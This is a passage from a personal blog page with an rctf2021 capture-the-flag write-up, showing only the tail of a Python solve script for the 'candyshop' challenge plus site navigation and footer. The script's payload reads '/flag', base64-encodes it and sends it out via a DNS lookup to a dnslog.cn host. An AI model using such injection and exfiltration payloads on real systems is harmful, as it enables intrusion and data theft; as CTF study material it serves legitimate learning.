/flag|base64`.lww0py.dnslog.cn&#x27;))\&quot;)()\n                                //&quot;</span>, <span class="string">&#x27;candyname&#x27;</span>:<span class="string">&#x27;bunny_candy&#x27;</span>, <span class="string">&#x27;address&#x27;</span>:<span class="string">&#x27;1&#x27;</span>&#125;)</span><br><span class="line">    <span class="built_in">print</span>(r.text)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    getPass()</span><br><span class="line">    login()</span><br><span class="line">    test()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/06/26/%E7%9B%B4%E5%8D%87%E6%9C%BA/" rel="prev" title="航概期末绝杀">
      <i class="fa fa-chevron-left"></i> 航概期末绝杀
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/10/12/greatwall2021/" rel="next" title="greatwall2021">
      greatwall2021 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#rctf2021"><span class="nav-number">1.</span> <span class="nav-text">rctf2021</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BA%9F%E8%AF%9D"><span class="nav-number">1.1.</span> <span class="nav-text">废话</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#easyphp"><span class="nav-number">1.2.</span> <span class="nav-text">easyphp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#candyshop"><span class="nav-number">1.3.</span> <span class="nav-text">candyshop</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="FYHSSGSS"
      src="/images/saiki.jpg">
  <p class="site-author-name" itemprop="name">FYHSSGSS</p>
  <div class="site-description" itemprop="description">Do you like what you see</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/FYHSSGSS" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;FYHSSGSS" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.cnblogs.com/FYH-SSGSS" title="Cnblog → https:&#x2F;&#x2F;www.cnblogs.com&#x2F;FYH-SSGSS" rel="noopener" target="_blank"><i class="fab fa-bimobject fa-fw"></i>Cnblog</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-en" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://selia1078.github.io/" title="https:&#x2F;&#x2F;selia1078.github.io&#x2F;" rel="noopener" target="_blank">selia❤</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://s0uthwood.github.io/" title="https:&#x2F;&#x2F;s0uthwood.github.io" rel="noopener" target="_blank">s0uthwood</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://kfxp12138.github.io/" title="https:&#x2F;&#x2F;kfxp12138.github.io" rel="noopener" target="_blank">triplewing</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://crazymanarmy.github.io/" title="https:&#x2F;&#x2F;crazymanarmy.github.io&#x2F;" rel="noopener" target="_blank">crazyman_army</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://justloseit.top/" title="https:&#x2F;&#x2F;justloseit.top&#x2F;" rel="noopener" target="_blank">Joker</a>
        </li>
    </ul>
  </div>

      </div>
      <div id="music163player">
      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=30482386&auto=1&height=66"></iframe>
      </iframe>
    </div>
    
    </div>
    
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2021 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-flag"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">FYHSSGSS</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">199k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">3:01</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

  

</body>
</html>
